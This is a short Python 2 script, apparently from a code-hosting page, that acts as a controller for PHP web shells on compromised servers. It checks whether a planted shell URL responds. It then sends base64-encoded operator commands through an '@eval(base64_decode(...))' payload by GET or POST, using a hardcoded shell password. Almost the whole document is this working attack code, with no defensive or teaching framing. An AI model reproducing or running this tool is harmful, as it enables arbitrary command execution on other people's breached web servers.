52 lines
1.3 KiB
Python
52 lines
1.3 KiB
Python
#!/usr/bin/python
|
|
#coding=utf-8
|
|
import requests,base64
|
|
|
|
def cmd(url,method,passwd,cmd):
|
|
#分割url ip 127.0.0.1:80 Rfile=/1111/x.php?pass=Sn3rtf4ck
|
|
try:
|
|
url.index("http")
|
|
#去除http:// ==> 127.0.0.1:80/1110/x.php
|
|
urlstr=url[7:]
|
|
lis = urlstr.split("/")
|
|
ip=str(lis[0])
|
|
Rfile = ""
|
|
for i in range(1,len(lis)):
|
|
Rfile = Rfile+"/"+str(lis[i])
|
|
except :
|
|
urlstr=url[8:]
|
|
lis = urlstr.split("/")
|
|
ip=str(lis[0])
|
|
Rfile = ""
|
|
for i in range(1,len(lis)):
|
|
Rfile = Rfile+"/"+str(lis[i])
|
|
#判断shell是否存在
|
|
try :
|
|
res = requests.get(url,timeout=3)
|
|
except :
|
|
print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
|
|
return 0
|
|
if res.status_code!=200 :
|
|
print("[-] %s Page Not Found!" %url)
|
|
return 0
|
|
#执行命令 system,exec,passthru,`,shell_exec
|
|
#a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs=
|
|
data={}
|
|
data['z0']=base64.b64encode(cmd)
|
|
if method=='get':
|
|
data[passwd]='@eval(base64_decode($_GET[z0]));'
|
|
try:
|
|
res = requests.get(url,params=data,timeout=3)
|
|
except :
|
|
pass
|
|
elif method=='post':
|
|
data['pass']='Sn3rtf4ck'
|
|
data[passwd]='@eval(base64_decode($_POST[z0]));'
|
|
try:
|
|
res = requests.post(url,data=data,timeout=3)
|
|
except:
|
|
pass
|
|
if res.status_code==200:
|
|
print("[+] %s Insert Sucessed!"%ip)
|
|
else :
|
|
print("[+] %s Insert Failed!"%ip) |
粤公网安备44010602013451号